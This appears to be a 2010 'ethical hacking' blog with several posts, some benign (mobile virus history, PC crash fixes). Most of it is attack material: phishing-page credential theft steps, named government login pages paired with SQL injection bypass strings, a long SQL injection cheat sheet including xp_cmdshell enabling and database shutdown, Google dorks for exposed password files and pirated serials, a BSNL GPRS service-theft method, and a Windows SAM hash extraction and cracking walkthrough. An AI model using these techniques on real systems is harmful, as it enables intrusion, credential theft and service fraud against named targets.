IP

HACKING IS NOT A CRIME FOR US COZ WE ARE ETHICAL HACKER. DON'T USE THIS BLOG MATERIAL TO CONDUCT A CRIME.THIS SITE's CONTENTS ARE ONLY FOR EDUCATIONAL PURPOSE.....

MOBILE VIRUS

Saturday, October 2, 2010


A mobile virus is an electronic virus that targets mobile phones or wireless-enabled Pads.
As wireless phone and PDA networks become more numerous and more complex, it has become more difficult to secure them against electronic attacks in the form of viruses or other malicious software
History
The first instance of a mobile virus occurred in June 2004 when it was discovered that a company called Ojam had engineered an anti-piracy Trojan virus in older versions of their mobile phone game Mosquito. This virus sent SMS text messages to the company without the user's knowledge. This virus was removed from more recent versions of the game; however it still exists on older, unlicensed versions. These older versions may still be distributed on file-sharing networks and free software download web sites.
In July 2004, computer hobbyists released a proof-of-concept mobile virus named Cabir. This virus replicates itself on Bluetooth wireless networks.
In March 2005 it was reported that a computer worm called Commwarrior-A has been infecting Symbian series 60 mobile phones. This worm replicates itself through the phone's Multimedia Messaging System (MMS). It sends copies of itself to other phone owners listed in the phone user's address book. Although the worm is not considered harmful, experts agree that it heralds a new age of electronic attacks on mobile phones.

Common mobile viruses

Cabir: Infects mobile phones running on Symbian OS. When a phone is infected, the message 'Caribe' is displayed on the phone's display and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals.

Duts: A parasitic file infecter virus and is the first known virus for the PocketPC platform. It attempts to infect all EXE files in the current directory (infects files that are bigger than 4096 bytes)

Skulls: A trojan horse piece of code. Once downloaded, the virus, called Skulls, replaces all phone desktop icons with images of a skull. It also will render all phone applications, including SMSes and MMSes useless

Commwarrior: First worm to use MMS messages in order to spread to other devices. Can spread through Bluetooth as well. It infects devices running under OS Symbian Series 60. The executable worm file once launched hunts for accessible Bluetooth devices and sends the infected files under a random name to various devices.
ReaD MorE

Techniques Which Make Your Pen Drive BootAble

Friday, October 1, 2010


You can make your pen drive boot able.its really cool suppose their is no cd rom in your computer and you want to format or repair your windows you can do these all just by making your pen drive bootable.
Necessary requirements:

Your hardware should be compatible (BIOS should be updated).

For details just check the link.........CLICK HERE
ReaD MorE

BOM SABADO


BOM SABADO!
the lattest orkut attack is a kind of XSS attack which attack on the cookies of orkut users and hope fully also stoling their ID and PASSWORD .
it work holds the property of worm with some special features.
My advise to you all if you people get such type of scrap in your orkut then plezse del it and change the PASSWORD also your security code od EMAIL ID.
Also delete all the cookies from your browser cache.......
"BOM SABADA" is a pourtguish word meaning "GooD DaY".
ReaD MorE

What does a Hacker do?

Sunday, March 28, 2010


some people ask me what does a hacker do so i am going to...........


well here's a pretty blunt definition of a hacker, a person who posseses a superior knowledge of anything that has to do with computers and the internet, a hacker has the ability to munipulate everything that he knows, meaning he can create, destroy, take apart, and put things back together. you can find hackers all over the place in the computer world, they make up about 95% of the high tech industry there the one's that get hired for computer, network, security, and internet realated jobs, still intrested? if so keep reading.......

There r Three types Of Hacker:---

Black Hat Hacker (Cracker)
White Hat Hacker (Ethical Hacker)
GraY Hat Hacker

Black Hat Hacker:- This is popularly known as Cracking. This essentially means hacking into system for malicious intent the community of Black hat hacker is growing both in no. and skills...

"BLACK HAT HACKING IS A CRIME"


White Hat Hacker:- This is also known as Penetration Testing. It involves the same tools, tricks and techniques that hackers use but with a difference...

"ETHICAL HACKING IS A LEGAL HACKING"
"ETHICAL HACKING IS PERFORMED WITH THE TARGETS PERMISSIONS"


Gray Hat Hacker:- Just in b/w of White and Black Hat, Gray Hat Describes a Cracker, who exploits a Security weakness in a computer system or product in order to bring the weakness to the attention of the owners. Unlike a black hat a gray hat acts without malicious intent...
The goal of a Gray Hat Hacker is to improve System and Network Security....
ReaD MorE

HOW PHISHERS CAPTURE YOUR PASSWORDS


HOW PHISHERS CAPTURE YOUR PASSWORDS-
1: make an account on ANY form hosting site exam. www.FORMHOSTING.com

2: open desktop make a login.txt file
3: on form host create a new directory its name may be orkut or yahoo

4: open the directory

5: upload all the three files to this directory

6: fake pages a.mail fake page.php. b.mail fake page.html c. login.txt

7: open mail fake page.html and copy and save web address of the corresponding fake page.
8: for seeing the email id and password of victims you can open login.txt page from
www.formhosting.com

9:copy the form link and mail to the victim.
ReaD MorE

SQL Continues


Hacking is an ART to bypass the security mechanisam of a system , network and/or server.I m going to give you some really exelent web sites which you can easily hack
http://sic.iuic.net.pk/courseware/index.asp
id:admin'--
pass:admin'--
* this sites relates to multan chief minister's.easily hacked by the help of these passwords which are present below.*
http://www.urbanunit.gov.pk/cmpackage/login.asp
id:administrator
pass:'or' '='
*these two pakistan government sites are vulnerable towards attacksTheir are many more *
even whole NIC server is vulnerable So always hack to learn
ReaD MorE

Sql Injection Attack


The passwords and the contents which i m giving hear is just for the education purpose please don't play with that it is a highly sophisticated matter.

In the world of hackers and hacking this method of exploiting web based services is very common.As the name SQL injection(Structural query language) means definitely we are going to use some common queries of SQL a very strong 4GL language which is generally used by data base programmers to manipulate with data base of a system, server and application software's.hear i will give you some popularly used SQL equerries which helps you to get admin rights in any web servers.

SOME COMMON PASSWORDS

Bypassing Login Screens (SMO+)

SQL Injection 101, Login tricks

* admin' --
* admin' #
* admin'/*
* ' or 1=1--
* ' or 1=1#
* ' or 1=1/*
* ') or '1'='1--
* ') or ('1'='1--
* ....
* Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

*Old versions of MySQL doesn't support union queries



Bypassing second MD5 hash check login screens

If application is first getting the record by user name and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.

Bypassing MD5 Hash Check Example (MSP)

Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

Error Based - Find Columns Names

Finding Column Names with HAVING BY - Error Based (S)

In the same order,

* ' HAVING 1=1 --
* ' GROUP BY table.columnfromerror1 HAVING 1=1 --
* ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
* ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
* If you are not getting any more error then it's done.

Finding how many columns in SELECT query by ORDER BY (MSO+)

Finding column number by ORDER BY can speed up the UNION SQL Injection process.

* ORDER BY 1--
* ORDER BY 2--
* ORDER BY N-- so on
* Keep going until get an error. Error means you found the number of selected columns.


SQL Injection in LIMIT (M) or ORDER (MSO)

SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

If injection is in second limit you can comment it out or use in your union injection

Shutdown SQL Server (S)

When you really pissed off, ';shutdown --
Enabling xp_cmdshell in SQL Server 2005

By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.

EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

Finding Database Structure in SQL Server (S)

Getting User defined Tables

SELECT name FROM sysobjects WHERE xtype = 'U'

Getting Column Names

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

Blind SQL Injections

About Blind SQL Injections

In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.

Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code
Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.

In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.

Real and a bit Complex Blind SQL Injection Attack Sample

This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.

TRUE and FALSE flags mark queries returned true or false.

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103-->FALSE> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89-->FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83-->FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80-->

Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.

Waiting For Blind SQL Injections

First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.

WAIT FOR DELAY 'time' (S)

This is just like sleep, wait for spesified time. CPU safe way to make database wait.

WAITFOR DELAY '0:0:10'--

Also you can use fractions like this,

WAITFOR DELAY '0:0:0.51'

Real World Samples

* Are we 'sa' ?
if (select user) = 'sa' waitfor delay '0:0:10'
* ProductID = 1;waitfor delay '0:0:10'--
* ProductID =1);waitfor delay '0:0:10'--
* ProductID =1';waitfor delay '0:0:10'--
* ProductID =1');waitfor delay '0:0:10'--
* ProductID =1));waitfor delay '0:0:10'--
* ProductID =1'));waitfor delay '0:0:10'--

BENCHMARK() (M)

Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!

BENCHMARK(howmanytimes, do this)

Real World Samples

* Are we root ? woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
* Check Table exist in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

pg_sleep(seconds) (P)

Sleep for supplied seconds.

* SELECT pg_sleep(10);
Sleep 10 seconds.


Apart from these all one password which always work for me is ( 'or' '=' ).

I have many web sites more then 100 in number where you can taste these passwords and techniques for the list and method you can mail me on abhidgr8hkr@gmail.com
ReaD MorE

Google Hacking


Application security vendor Fortify reported in 2006 that 20 percent to 30 percent of the attacks it recorded as part of a six-month study came as a result of some form of search engine hacking.

Google is not particularly enamored by the efforts of some of its users to use its index for malicious gain.

"As part of Google's efforts to index all of the information online we find that on occasion malicious executable files become available to users through Google Web search," Megan Quinn, a Google spokeswoman, told internetnews.com. "We deplore these malicious efforts to violate our users' security.
http://www.hackthissite.org/articles/read/991
"When possible, we endeavor to shield our users from these executable files," Quinn added. "However we always encourage users to keep their security software up-to-date to ensure the safest Web surfing experience."

But what kind of Codes are available I hear you all ask;

Well here's just a few of them I've found out about. . .

Interesting Searches…
* Source http://www.i-hacked.com/content/view/23/42/
* intitle:"Index of" passwords modified
* allinurl:auth_user_file.txt
* "access denied for user" "using password"
* "A syntax error has occurred" filetype:ihtml
* allinurl: admin mdb
* "ORA-00921: unexpected end of SQL command"
* inurl:passlist.txt
* "Index of /backup"
* "Chatologica MetaSearch" "stack tracking:"
* inurl:passwd.txt
…and this one is just priceless…
* "login: *" "password= *" filetype:xls

Listings of what you want
* change the word after the parent directory to what you want
* "parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
* "parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
* "parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
* "parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
* "parent directory " Name of Singer or album" -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Music (*this is already posted in another thread)
* You only need add the name of the song/artist/singer.
* Example: intitle:index.of mp3 jackson

CD Images
* inurl:microsoft filetype:iso
* You can change the string to whatever you want, ex. Microsoft to Adobe, .iso to .zip etc…

Passwords
* "# -FrontPage-" inurl:service.pwd FrontPage passwords.. very nice clean search results listing !!

* "AutoCreate=TRUE password=*" This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/

Passwords in the URL
* "http://*:*@www" domainname This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the domain name without the .com or .net
* "http://*:*@www" gamespy or http://*:*@www"gamespy
* Another way is by just typing "http://bob:bob@www"

IRC Passwords
* "sets mode: +k" This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
* eggdrop filetype:user user These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

Access Database Passwords
* allinurl: admin mdb Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!

DCForum Passwords
* allinurl:auth_user_file.txt DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks.

MySQL Passwords
* intitle:"Index of" config.php
* This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

The ETC Directory
* intitle:index.of.etc
* This search gets you access to the etc directory, where many, many, many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!

Passwords in backup files
*filetype:bak inurl:"htaccess|passwd|shadow|htusers
* " This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extension of a file on a web server can have ugly consequences.

Serial Numbers
* Let's pretend you need a serial number for Windows XP Pro.
* In the Google search bar type in just like this - "Windows XP Professional" 94FBR
* the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' sites (usually pornography) that trick you.
* or if you want to find the serial for WinZip 8.1 - "WinZip 8.1" 94FBR

These are only a sample of some of the fun things you can do with the wrong kind of Google search. Such strings return very random results, and are of very little use for targeted attacks. But for random hacking of peoples Frontpage password's, it's priceless.

* inurl:(service | authors | administrators | users) ext:pwd "# -FrontPage-"
ReaD MorE

BSNL GPRS Hack


here are the steps to perform:-

Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working,

Supported devices: all phones with multichannel gprs support

For connection on your mobile phone:-

1) Make two connections like bsnlportal and BSNLPORTAL1

(names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,)

2) Select the application you got to have the full connection working on.
Surpassingly “web” now just select “bsnlportal” profile and select a link like wap.cellone.in the page will get open, just press the red button such that the “web” application goes in the background.
Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this

3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error –

the aim of using the other app is to perform multi-channel gprs,
this is verified by seeing some dots on the pre-existing connection established by “web”

(step 2)

“Access denied.

Technical description:
403 Forbidden - You are not allowed to communicate with the requested resource.”

4) close opera and open web and open a site like esato.com

5) if everything is done as said here then esato will load and voila! We have the whole internet!

For connection on pc.

1)create a connection and enter the number to be dialed as *99***1#

2) enter the following string as extra initialization command

3)now dial from pc, the connection will be established

4)pick the phone and open “web” open “wap.cellone.in” the phone shows error .

5) close “web” and then from the browser open www.google.com
and voila! The whole intenet is here

settings for profiles

apn: celloneportal
ip: 192.168.51.163
port : 8080

leave other fields blank as they are of the least concern!

the browser settings on pc too go the same as mentioned above!
ReaD MorE

10 reasons why PCs crash U must Know


Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

Some strong antiviruses are-
1.Quick heal
2.Avg
3.kaspersky
4.nortan
5.Bit defender

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.
ReaD MorE

How To Break Syskey


Syskey Breaker A little over a year ago I wrote a little tutorial called "Cracking Windows 2000
And XP Passwords With Only Physical Access" [0]. It was pretty popular and the data is still useful but in the last year I've found far better ways to crack a SAM file with SysKey enabled. One reason I'm writing this new tutorial is because sometime after SAMInside v.2.1.3 exporting to a PWDump file was disabled in the demo version. There are still ways SAMInside could be used, but there are better Open Source tools now that can do the same tasks. This tutorial will recap parts of the original, but also give a far simpler, faster and more concise way to crack hashes in the SAM file that are protected by SysKey.

SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has had SysKey enabled by default. The way most folks crack a SAM file on a system that uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN Manager) and NT hashes. The problem is PWdump only works if you can run it from an administrator level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator level account then PWdump is of little use.

Some folks will ask why would you want to crack the passwords in the SAM at all since it's far easier to just change the Administrator password using a Linux boot disk or Sala's Password Renew for PE Builder. The reason an attacker may want to crack the local passwords instead of changing them is two fold:

1. An attacker doesn't want to tip off the system administrators. If they notice that the old local admin password no longer works they will get a little bit suspicious don't you think? This is somewhat solved by Sala's Password Renew since it lets you add new admin level accounts as well as change existing account's passwords.

2. The same local account passwords may be used on other systems on the network (and most likely are if they use imaging software like Ghost). If the attacker can crack one machine's admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access (across the network) to.

This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to the Knoppix variant known as the Auditor security collection boot CD [5] (I'm using version 120305-01 in this tutorial). Here are the steps you will need to take in order to audit local passwords using the Auditor CD:

Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dell's it's F12).

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

Step 5. Mount the local hard disk, most likely hda1:

Linux Command:

mount /dev/hda1


Step 6. Change the present working directory to the ramdisk so we space to work with the files we will be creating:

Linux Command:

cd /ramdisk/


Step 7. Auditor comes with Ncuomo's Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32/config\SYSTEM, that's where it is on my XP Pro test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt


Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt


Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I'll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:

gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt


Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

john password-hashes.txt -w:eng.txt


John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format "NT LM DES [32/32 BS]" automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the –f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

john password-hashes.txt -f:NT -w:eng.txt


